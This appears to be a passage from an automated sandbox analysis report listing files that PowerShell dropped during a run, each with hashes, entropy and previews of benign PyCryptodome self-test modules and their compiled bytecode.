                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/__init__.py: Self-test for utility modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1461
                                                                                                                                                                                                              Entropy (8bit):5.220781526327634
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:nIlry7uPGnIbMu4kG4r/MLaLZIk8T+aL9A2xloyg2bld8rzFitoXmWPLt6:ItinIT2aLZ/ha9A2xKyg2xYIoN6
                                                                                                                                                                                                              MD5:941BDE1EA94C96A501DFD342FD5EEC6F
                                                                                                                                                                                                              SHA1:C43C7E02AAC8AB2FB67C94A052913396C602D462
                                                                                                                                                                                                              SHA-256:019FA8FD6E28D96E5F8C0DB68DAEB691602916BDDD8EFE61DFBF0C28B1A1722F
                                                                                                                                                                                                              SHA-512:9A002CE390921F03EF7EE9B58461CEFCFC2067D4B689CA8566A1AC5B96A6C645D50B1579001B1B41B6C9A5516EE279F6639DED9BDB58264016C8D33C627B7A95
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e..........................^.....d.Z.d.Z.d.d.l.Z.i.f.d...Z.e.d.k(..r.d.d.l.Z.d...Z...e.j...................d.............y.y.).z.Self-test for utility modulesz.$Id$.....Nc.....................N.....g.}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.|.S.).Nr....)...test_number)...config)...test_Counter)...test_Padding)...test_strxor)...test_asn1)...test_rfc1751)...Crypto.SelfTest.Utilr......get_testsr....r....r....r....r....).r......testsr....r....r....r....r....r....s.... .qC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Util/__init__.pyr....r........s..........E..0.%.;.;P.;P.X^.;P.;_.2_.%..1.5.L.<R.<R.Z`.<R.<a.3a.5..1.5.L.<R.<R.Z`.<R.<a.3a.5..0.%.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2850
                                                                                                                                                                                                              Entropy (8bit):4.753930417156155
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:0GfrLdg52xLy/PeG1FdNY5is3FQbeH6OY5j8oWQasHhX:lrSwLCPeGndNY4EFdVYF8M3
                                                                                                                                                                                                              MD5:63913604DDDF8EEB7E7479C4DB0B12EB
                                                                                                                                                                                                              SHA1:B60F6D2534DEC2AEBE8684822AC6F498F13BAD14
                                                                                                                                                                                                              SHA-256:88E8FEC11902754A7825B8DF6EF0C5FC80498995099DE26D9B01CF511A1DF166
                                                                                                                                                                                                              SHA-512:5BE171266FF9B38ECED555CDF7CA26D1856626ABC3C35796A4637CC1373E609E715EA73D411F788397DAA490938EB899DA93FFC1B30CB354D2AD0349F63484B8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e#..............................d.Z.d.d.l.....d.d.l.Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.).z"Self-tests for Crypto.Util.Counter.....)...*Nc.....................6.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...CounterTestsc...........................d.d.l.m.a...y.).Nr....)...Counter)...Crypto.Utilr....)...selfs.... .uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Util/test_Counter.py..setUpz.CounterTests.setUp ...s........'.....c.....................\.....t.........j...................d.........}.t.........j...................d.d...........}.y.).z.Big endian....F....little_endianN..r......new..r......cs.... r......test_BEz.CounterTests.test_BE$...s".........K.K...........K.K...5.K..1..r....c.....................2.....t.........j...................d.d...........}.y.).z.Little endianr....Tr....Nr....r....s.... r......test_LEz.CounterTests
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9332
                                                                                                                                                                                                              Entropy (8bit):4.464510692030408
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:60I7v7HP3/ImfhoQYPt/BE7sP8/BKiCo+7etjSN8:OIiMQBxtjB
                                                                                                                                                                                                              MD5:56CD1F8DAE24A016CD7B7F42B619593B
                                                                                                                                                                                                              SHA1:730FB972D47026717F277877856AFDBC6E6E93ED
                                                                                                                                                                                                              SHA-256:4456E087491A4213E7BA471F5B3883FCA8E3638CDADF6D53873306CFCA3E4DAF
                                                                                                                                                                                                              SHA-512:5EE56E3FE217359FBD247564051F74C6FC4097516674CC7BFC2B0DA5482A64B24D822FB04BDDCF3C385C7366975DD86F2836455FDD7F00ED251A2635C1B7FE7E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eP...............................d.d.l.Z.d.d.l.m.Z...d.d.l.....d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j"..................d.............y.y.)......N)...unhexlify)...*)...list_test_cases)...pad..unpadc.....................6.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...PKCS7_Testsc.....................D.....t.........t.........d.........d.........}.|.j...................|.t.........t.........d.................k(............t.........t.........d.........d.d.........}.|.j...................|.t.........t.........d.................k(............t.........|.d.........}.|.j...................|.t.........d.........k(............y.).N.........04040404..pkcs7..r......b..assertTrue..uhr........self..padded..backs.... .uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Util/test_Pad
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):46117
                                                                                                                                                                                                              Entropy (8bit):4.338703618538804
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:ILV+RHqHZnwPK0HzYSSnMKK3zONynHhwc9qjqePg:ILV+qwiW+MKK3zONynvePg
                                                                                                                                                                                                              MD5:4333FC17A863761045CD1BD6D61C5D3B
                                                                                                                                                                                                              SHA1:B8C9FE3C5F8D03586B1605C8B26370915AA5DB65
                                                                                                                                                                                                              SHA-256:7A6BB7B7F2C1813A5696A29D5DFFCDBF1AFD683CE8A8340505A15B43036BE6ED
                                                                                                                                                                                                              SHA-512:D34A1771840DF7D1B22D0E12449D580F46E51CA4046E24EDCDA895197AA06085445209E4DC72541AC4B9EED5FF0825AC346EEB100D33485665E37C5C2A2E4F99
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.ek}..............................d.Z.d.d.l.Z.d.d.l.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j4..................d.............y.y.).z.Self-tests for Crypto.Util.asn1.....N)...*)...DerObject..DerSetOf..DerInteger..DerBitString..DerObjectId..DerNull..DerOctetString..DerSequence..DerBooleanc.....................`.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...DerObjectTestsc..........................|.j...................t.........t.........t.........d...................|.j...................t.........t.........d...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12162
                                                                                                                                                                                                              Entropy (8bit):4.402513959794309
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:iIz15BBTOd1eseUBwwxwwwwxwwwwwwxwwwwwwwwDEKN5jUF3tt+AtsWEZOnRUm+M:HrkRHEKOe9G+mUE6iyRrc/9
                                                                                                                                                                                                              MD5:A8863A1DEAF106AABA261BA8D19F7E0E
                                                                                                                                                                                                              SHA1:2CEC863519C417D69EAB0FE4421C8FB445245781
                                                                                                                                                                                                              SHA-256:42BF14AAA48235383D40224EBC1CE6F1FB4AA94FCFB0BE171329CFC059129D27
                                                                                                                                                                                                              SHA-512:7451545BE708B50F049339C3A354FAA0F11AA40068CA13BC923F78327960022D495EE8B35F7E070A12702299F03833033AACFFAACB91F98659849665C083DC64
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e."..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j$..................d.............y.y.).z+Self-tests for (some of) Crypto.Util.number.....N)...*)...list_test_cases)...number)...long_to_bytesc...........................e.Z.d.Z.d.Z.y.)...MyErrorz.Dummy exception used for testsN)...__name__..__module__..__qualname__..__doc__........tC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Util/test_number.pyr....r....%...s........(r....r....c.....................*.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...MiscTestsc.....................8.....|.j...................t.........t.........j...................d.d...........|.j...................t.........t.........j...................d.d...........|.j...................t.........t.........j................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2102
                                                                                                                                                                                                              Entropy (8bit):5.453818388611598
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:7mPQ9lrvdkjuyONHuck2a2xkJh0Oo3BA3FfjaYx/vYF2coBJxxPnT:qQvSApe6kJTGaF7BvYF2cMxvT
                                                                                                                                                                                                              MD5:97DD1F74A2ACA8944D888A5966442DD0
                                                                                                                                                                                                              SHA1:7D36BA0F6303A61DF89794E6178AFCF20714E5DF
                                                                                                                                                                                                              SHA-256:F0159F0E27C70ADF133E6D9307423E73FF963B927C0AAFA084D391F8733E80E6
                                                                                                                                                                                                              SHA-512:34055672630B49721B8D019DDAA68D3D66FA993D49EDECD13710213FAAC9E776F77AD6300EF7BA0B386834679F0F4A9402D792390FD19C7170068E4EE8C01D81
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e...............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.....G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.)......N)...key_to_english..english_to_keyc...........................e.Z.d.Z.d...Z.d...Z.y.)...RFC1751_Testsc..........................g.d...}.|.D.]T..\...}.}.t.........j...................|.........}.t.........|.........}.|.j...................|.|...........t.........|.........}.|.j...................|.|............V..y.).N).)...EB33F77EE73D4053z.TIDE ITCH SLOW REIN RULE MOT).. CCAC2AED591056BE4F90FD441C534766z8RASH BUSH MILK LOOK BAD BRIM AVID GAFF BAIT ROT POD LOVE).. EFF81F9BFBC65350920CDD7416DE8009z7TROD MUTE TAIL WARM CHAR KONG HAAG CITY BORE O TEAL AWL)...binascii..a2b_hexr......assertEqualr....)...self..data..key_hex..words..key_bin..w2..k2s.... .uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Util/test_rfc1751.py..test1z.RFC1751_Tests.te
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12207
                                                                                                                                                                                                              Entropy (8bit):4.730379618745065
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:pUjIrPAbX+JXuQhImWFMNEWjFbvcKSWBm9F9dbkCZHrane:yyITzQS5CDchem9F9rHrae
                                                                                                                                                                                                              MD5:A94E5C025BD15048F6F3B486A8C3C055
                                                                                                                                                                                                              SHA1:39DA08F4E5641C054370175FF5A1A6568553E95A
                                                                                                                                                                                                              SHA-256:2A283E387FE73931D10F0DFA6813565542395299F72239A74C31B65093F610B9
                                                                                                                                                                                                              SHA-512:62095EAC135E089EED551A098D9751F74AB09A9EA0FF7B454B95115C4D9AFFA5C9F58DD0C1CE65D249B3DF19CB5F3230576722A7B0DBBB72C224891ABF8CAA7E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.(..............................d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.)......N)...unhexlify..hexlify)...list_test_cases)...strxor..strxor_cc.....................Z.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...StrxorTestsc..........................t.........d.........}.t.........d.........}.t.........d.........}.|.j...................t.........|.|.........|...........|.j...................t.........|.|.........|...........y...N.....ff339a83e5cd4cdf5649.....383d4ba020573314395b.....c70ed123c59a7fcb6f12).r......assertEqualr....)...self..term1..term2..results.... .tC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Util/test_strxor.py..test1z.StrxorTests.test1+...sQ..........1..2.......1..2.......2..3................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2339
                                                                                                                                                                                                              Entropy (8bit):5.202413718317069
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:NxF/TEIB0jcQHMsvI/S3oCFcr+QuD0XTFBWTMhaja:5bfFQHvopH60XJBW4hZ
                                                                                                                                                                                                              MD5:F8501D1710CC47279356124DDD4A9A49
                                                                                                                                                                                                              SHA1:197A10A96EE658F58A107AF631A114904E4A6EC6
                                                                                                                                                                                                              SHA-256:F4DFE661669A43868A44FBDC01A60DFDDED11FC5A770E8B2554152DEC251F2D3
                                                                                                                                                                                                              SHA-512:EE8ACC076B992FB3C4409B5F04E06FBC6AD284886837BDEDD802CABC6228AF450333F9ABE374BFEDD24DE9CDBFD04CA7C06A93B03DB5CC54AD2CF5DCB4371D5B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_Counter: Self-test for the Crypto.Util.Counter module..#..# Written in 2009 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..#
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5968
                                                                                                                                                                                                              Entropy (8bit):5.267773090086199
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:RnQWOqrYJALrYJHdG43tDs3EsIG13NcuIHYtP+Q2+J+0V7x0x0xQ0y0w0i0+L0+2:aDqrYJALrYJHdt3EHGuI4pH2szilvr4
                                                                                                                                                                                                              MD5:045488719FC3B54CD805AFEA79086287
                                                                                                                                                                                                              SHA1:0079310849DE854819E7324DBEE7A9459F297BEE
                                                                                                                                                                                                              SHA-256:012373897A1401AA2BAFC1D4029E5C239355CBED106A163B57011AFDBC18C084
                                                                                                                                                                                                              SHA-512:7BCF2EAE6E754C947FB3A4418491DF4AD8C99771A3D2DB0F8FA1DD1736C4118059C5CCB3C0F1B26B301155EF1DAB4F606CC56C56263F1A1AA7C078061715AA5C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# SelfTest/Util/test_Padding.py: Self-test for padding functions..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIME
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32107
                                                                                                                                                                                                              Entropy (8bit):4.8144423694550875
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Prskrs9VqIXAYJ+oGchbBZ2XmO2CQBL7plKRA0:Pr6qIXAQ+Q1BZ2XmO2CQBL7pl30
                                                                                                                                                                                                              MD5:29B2837A29B459F7AC7356C3E4AFEE8C
                                                                                                                                                                                                              SHA1:217FF3DBCBA7ACFCD46C51E29F7198C751767E49
                                                                                                                                                                                                              SHA-256:33EE3596C53755388DD219D425DE8F1D65F3CF64346ADFA51A2DE46846A5950B
                                                                                                                                                                                                              SHA-512:577671B265BCFB82A760F83DA006EE1FC6FDAD5ED34A8CB4FEF8D48E058697840E182121E93CEB9FD81A614A2E68B9011DF204B202FFE63F9125199A22B78423
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# SelfTest/Util/test_asn.py: Self-test for the Crypto.Util.asn1 module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DIS
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with very long lines (303), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8710
                                                                                                                                                                                                              Entropy (8bit):5.184554837708348
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:jwfFQHvoBNH2Pbvf6KWvf0RoWRfrrFSRfnb3bjVj/3pjq7PfcN1Ep3S0rZ:jwdQHvd7WvfhQrrFknb3Rpta/rZ
                                                                                                                                                                                                              MD5:8CFC6216203E8227001F370383E6DF55
                                                                                                                                                                                                              SHA1:6B104AAA274506FED8794ED9C2414D4FA94AA6C6
                                                                                                                                                                                                              SHA-256:948547B6DB811911AA4E75E5E336CED60A3BE1036D4FD6C5AC68FF86662981AF
                                                                                                                                                                                                              SHA-512:CB6A289B14960AA4CDED95E21AEF8B2C2997DD90F56D9CDC033D27AEA2818F6963880553BE13DE8B647163EFFB315AA4EC87F572BD311AA62CF72102BFCC5A63
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_number.py: Self-test for parts of the Crypto.Util.number module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT O
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1151
                                                                                                                                                                                                              Entropy (8bit):5.090285924912527
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:+1+715k8BZTiOYBHHkhzgtJpQyRXPLy1jgpajoP:+1+717Z+OkKc7QyRXTYOajy
                                                                                                                                                                                                              MD5:A0C63441A48C45F3417E90BD604DEBEE
                                                                                                                                                                                                              SHA1:7D80DD96977104ECE9AD12DAE596C289AB46947C
                                                                                                                                                                                                              SHA-256:4BAD1C6F40BB00F3551BCC1F1849E895178B15133E6DFCC0F10657FF1C5367A9
                                                                                                                                                                                                              SHA-512:80428786485D50A4915B3BE184B7BBB674B0BC277F1966591C0BD3D6366155F02F31ABD6972A7AC9ACFACCE9039801851340080872B51597F8E71553212727DB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest....import binascii..from Crypto.Util.RFC1751 import key_to_english, english_to_key......class RFC1751_Tests(unittest.TestCase):.... def test1(self):.. data = [.. ('EB33F77EE73D4053', 'TIDE ITCH SLOW REIN RULE MOT'),.. ('CCAC2AED591056BE4F90FD441C534766', 'RASH BUSH MILK LOOK BAD BRIM AVID GAFF BAIT ROT POD LOVE'),.. ('EFF81F9BFBC65350920CDD7416DE8009', 'TROD MUTE TAIL WARM CHAR KONG HAAG CITY BORE O TEAL AWL').. ].... for key_hex, words in data:.. key_bin = binascii.a2b_hex(key_hex).... w2 = key_to_english(key_bin).. self.assertEqual(w2, words).... k2 = english_to_key(words).. self.assertEqual(k2, key_bin).... def test_error_key_to_english(self):.... self.assertRaises(ValueError, key_to_english, b'0' * 7)......def get_tests(config={}):.. from Crypto.SelfTest.st_common import list_test_cases.. tests = list_test_cases(RFC1751_
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10495
                                                                                                                                                                                                              Entropy (8bit):5.073385582254096
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:0Vqrskrs9t3q/ILyOZMz75bdPmbMSGSrZ7llGLrOp:08rskrs9VqHOZMxjSrZJ
                                                                                                                                                                                                              MD5:FB3C8204F2C018E2825D45B12991A186
                                                                                                                                                                                                              SHA1:0BB3FEDFDC56F251526FF5DE20B2058BD1FDB3B1
                                                                                                                                                                                                              SHA-256:94A8D7005DAFC4F46C6DD73D758471E2E13CCAA4666D135C3F64DB04EC1E51D0
                                                                                                                                                                                                              SHA-512:5DF2907343C969CFB0D5BC28C4A5A5243BCB80F70E4DD482DFCF91AB10436235934329E49122B6A0788855F55683AE9F543750BA1D5E22D683A901BBAD31FD33
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# SelfTest/Util/test_strxor.py: Self-test for XORing..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVE
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3311
                                                                                                                                                                                                              Entropy (8bit):5.046154186405365
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:newfFQHvov0c11HR8GqgxpSKgdkyKv2JeIPHkOS:newdQHv+V00+dkyKv24IcOS
                                                                                                                                                                                                              MD5:6006235799D8B51FA0D57D451012FBF9
                                                                                                                                                                                                              SHA1:5FF6022873D06D926211402F22235339F228ED24
                                                                                                                                                                                                              SHA-256:A5195DE8F0FD1855C9FE4170915BC36C9C9F85DF5B8E14FEAF817C570F9C25F1
                                                                                                                                                                                                              SHA-512:66EB48B147A76F1531746E13E699610C26CB8094833005223ACF0B7A74E548388AE94349A642EF2A40132076A1D8C8A74EE85997AD3BE8290B758A76A9E3FE06
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/__init__.py: Self-test for PyCrypto..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWAR
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1612
                                                                                                                                                                                                              Entropy (8bit):5.252093420200057
                                                                                                                                                                                                              Encrypted:false
